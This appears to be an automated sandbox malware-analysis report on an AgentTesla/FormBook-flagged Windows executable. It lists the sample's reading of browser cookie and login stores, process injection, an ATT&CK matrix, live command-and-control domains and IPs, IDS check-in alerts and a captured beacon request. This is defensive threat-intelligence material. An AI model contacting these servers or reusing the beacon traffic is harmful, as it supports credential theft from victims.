            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\indent PWS-020199.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match | File source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netiougc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netiougc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match | File source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

            [Behavior graph. ID: 1465309; Sample: indent PWS-020199.exe; Startdate: 01/07/2024; Architecture: WINDOWS; Score: 100]

            Source | Detection | Scanner | Label | Link
            indent PWS-020199.exe | 68% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
            indent PWS-020199.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            http://www.hellokong.xyz/ov93/0%Avira URL Cloudsafe
            http://tempuri.org/DataSet1.xsd0%Avira URL Cloudsafe
            http://www.eylmpwjot.store/3mcu/0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://www.searchvity.com/?dn=0%Avira URL Cloudsafe
            http://www.eylmpwjot.store0%Avira URL Cloudsafe
            http://www.searchvity.com/0%Avira URL Cloudsafe
            http://www.artvectorcraft.store/jabf/0%Avira URL Cloudsafe
            http://www.netgain360.online/7w6o/0%Avira URL Cloudsafe
            https://www.mareomnia.com/ya74/?dBOL8fg=100%Avira URL Cloudmalware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ghs.google.com | 142.250.74.211 | true | false | | unknown
www.netgain360.online | 66.96.162.130 | true | true | | unknown
www.mareomnia.com | 81.4.100.198 | true | false | | unknown
www.hellokong.xyz | 203.161.49.220 | true | true | | unknown
www.eylmpwjot.store | 43.132.189.227 | true | true | | unknown
www.artvectorcraft.store | unknown | unknown | true | | unknown
www.xxikcn20.icu | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.eylmpwjot.store/3mcu/ | true | Avira URL Cloud: safe | unknown
http://www.hellokong.xyz/ov93/ | true | Avira URL Cloud: safe | unknown
http://www.artvectorcraft.store/jabf/ | false | Avira URL Cloud: safe | unknown
http://www.netgain360.online/7w6o/ | true | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
81.4.100.198 | www.mareomnia.com | Netherlands | 198203 | ASN-ROUTELABELNL | false
142.250.74.211 | ghs.google.com | United States | 15169 | GOOGLEUS | false
43.132.189.227 | www.eylmpwjot.store | Japan | 4249 | LILLY-ASUS | true
66.96.162.130 | www.netgain360.online | United States | 29873 | BIZLAND-SDUS | true
203.161.49.220 | www.hellokong.xyz | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1465309
                          Start date and time:2024-07-01 15:10:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 8m 47s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:10
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:2
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:indent PWS-020199.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@7/2@6/5
                          EGA Information:
                          • Successful, ratio: 75%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 92
                          • Number of non-executed functions: 282
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes were analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • VT rate limit hit for: indent PWS-020199.exe
Time | Type | Description
09:10:59 | API Interceptor | 1x Sleep call for process: indent PWS-020199.exe modified
09:12:06 | API Interceptor | 2021057x Sleep call for process: netiougc.exe modified
                          Process:C:\Users\user\Desktop\indent PWS-020199.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1216
                          Entropy (8bit):5.34331486778365
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                          Malicious:true
                          Reputation:high, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                          Process:C:\Windows\SysWOW64\netiougc.exe
                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                          Category:dropped
                          Size (bytes):114688
                          Entropy (8bit):0.9746603542602881
                          Encrypted:false
                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                          Malicious:false
                          Reputation:high, very likely benign file
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.913249107659337
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                          • Win32 Executable (generic) a (10002005/4) 49.93%
                          • Windows Screen Saver (13104/52) 0.07%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          • DOS Executable Generic (2002/1) 0.01%
                          File name:indent PWS-020199.exe
                          File size:727'560 bytes
                          MD5:66800cae69c4278c8a33921d624b7528
                          SHA1:e3abc9476cde1dc7ca5a2baa546534d625c0d325
                          SHA256:64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
                          SHA512:aa5e313dfb486ef208c8f6397c9d7a73b1dfc15aa9dd76f131a6a2def5bd67329ba504496e99c70fa7d047d74f8c0b25865193479692d8f09ddab671acc24544
                          SSDEEP:12288:f6mu8wtNPu29Q/ACCLw74+lwjMCSeFZjYpNHXkQXMa0rTpd8lKZ8B2i2vXtCYKzk:ivh9Q/7CM7OjzS20pNHXkWFLGV3KzzsR
                          TLSH:27F412247B64EF22E17E4FF10634F50197F6250F68B5D4084ED6A4EB64A6F8047B1A8F
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\...............0.................. ........@.. .......................@............@................................
                          Icon Hash:3323c38baeb2b8a5
                          Entrypoint:0x4ae90e
                          Entrypoint Section:.text
                          Digitally signed:true
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0xCB5C881E [Fri Feb 11 21:03:26 2078 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Signature Valid:false
                          Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                          Signature Validation Error:The digital signature of the object did not verify
                          Error Number:-2146869232
                          Not Before, Not After
                          • 13/11/2018 00:00:00 08/11/2021 23:59:59
                          Subject Chain
                          • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                          Version:3
                          Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                          Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                          Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                          Serial:7C1118CBBADC95DA3752C46E47A27438
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xae8bc | 0x4f | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x14e8 | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0xae400 | 0x3608 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0xab9a0 | 0x70 | .text
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0xac914 | 0xaca00 | 0ce84c843d3f5190f2bdf06f44bcd1c6 | False | 0.9338440781136857 | data | 7.919292677582139 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0xb0000 | 0x14e8 | 0x1600 | aa436ddc566586f36abd3037316b060c | False | 0.7386363636363636 | data | 7.234657283799016 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0xb2000 | 0xc | 0x200 | 94b5c1a06eddbe8c9189cfdbca6ad2d9 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_ICON | 0xb0130 | 0xe89 | PNG image data, 224 x 224, 8-bit/color RGBA, non-interlaced | | | 0.902176834184359
                          RT_GROUP_ICON | 0xb0fbc | 0x14 | data | | | 1.1
                          RT_VERSION | 0xb0fd0 | 0x32a | data | | | 0.4641975308641975
                          RT_MANIFEST | 0xb12fc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          07/01/24-15:12:03.875197 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49746 | 80 | 192.168.2.4 | 66.96.162.130
                          07/01/24-15:12:44.166991 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49758 | 80 | 192.168.2.4 | 43.132.189.227
                          07/01/24-15:12:17.123480 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49750 | 80 | 192.168.2.4 | 203.161.49.220
                          07/01/24-15:12:46.704903 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49759 | 80 | 192.168.2.4 | 43.132.189.227
                          07/01/24-15:12:30.379024 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49754 | 80 | 192.168.2.4 | 142.250.74.211
                          07/01/24-15:12:33.079742 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49755 | 80 | 192.168.2.4 | 142.250.74.211
                          07/01/24-15:12:06.407420 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49747 | 80 | 192.168.2.4 | 66.96.162.130
                          07/01/24-15:12:19.661497 | TCP | 2855464 | ETPRO TROJAN FormBook CnC Checkin (POST) M3 | 49751 | 80 | 192.168.2.4 | 203.161.49.220
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jul 1, 2024 15:11:42.830929995 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb43 | Standard query (0) | www.xxikcn20.icu | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:11:47.853863001 CEST | 192.168.2.4 | 1.1.1.1 | 0xbb06 | Standard query (0) | www.mareomnia.com | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:03.557235956 CEST | 192.168.2.4 | 1.1.1.1 | 0x7dff | Standard query (0) | www.netgain360.online | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:16.994961023 CEST | 192.168.2.4 | 1.1.1.1 | 0xfcea | Standard query (0) | www.hellokong.xyz | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:30.339020014 CEST | 192.168.2.4 | 1.1.1.1 | 0xcef2 | Standard query (0) | www.artvectorcraft.store | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:43.794682026 CEST | 192.168.2.4 | 1.1.1.1 | 0x2b19 | Standard query (0) | www.eylmpwjot.store | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jul 1, 2024 15:11:42.847588062 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb43 | Name error (3) | www.xxikcn20.icu | none | none | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:11:47.884944916 CEST | 1.1.1.1 | 192.168.2.4 | 0xbb06 | No error (0) | www.mareomnia.com | | 81.4.100.198 | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:03.865873098 CEST | 1.1.1.1 | 192.168.2.4 | 0x7dff | No error (0) | www.netgain360.online | | 66.96.162.130 | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:17.114538908 CEST | 1.1.1.1 | 192.168.2.4 | 0xfcea | No error (0) | www.hellokong.xyz | | 203.161.49.220 | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:30.367228031 CEST | 1.1.1.1 | 192.168.2.4 | 0xcef2 | No error (0) | www.artvectorcraft.store | ghs.google.com | | CNAME (Canonical name) | IN (0x0001) | false
                          Jul 1, 2024 15:12:30.367228031 CEST | 1.1.1.1 | 192.168.2.4 | 0xcef2 | No error (0) | ghs.google.com | | 142.250.74.211 | A (IP address) | IN (0x0001) | false
                          Jul 1, 2024 15:12:44.148720980 CEST | 1.1.1.1 | 192.168.2.4 | 0x2b19 | No error (0) | www.eylmpwjot.store | | 43.132.189.227 | A (IP address) | IN (0x0001) | false
                          • www.mareomnia.com
                          • www.netgain360.online
                          • www.hellokong.xyz
                          • www.artvectorcraft.store
                          • www.eylmpwjot.store
                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          0 | 192.168.2.4 | 49744 | 81.4.100.198 | 80 | 4320 | C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Jul 1, 2024 15:11:47.898155928 CEST | 496 | OUT | GET /ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK HTTP/1.1
                          Host: www.mareomnia.com
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-us
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                          Jul 1, 2024 15:11:48.515640974 CEST | 874 | IN | HTTP/1.1 301 Moved Permanently
                          Date: Mon, 01 Jul 2024 13:11:48 GMT
                          Server: Apache/2.4.29 (Ubuntu)
                          X-Frame-Options: SAMEORIGIN
                          Location: https://www.mareomnia.com/ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK
                          Content-Length: 470
                          Connection: close
                          Content-Type: text/html; charset=iso-8859-1
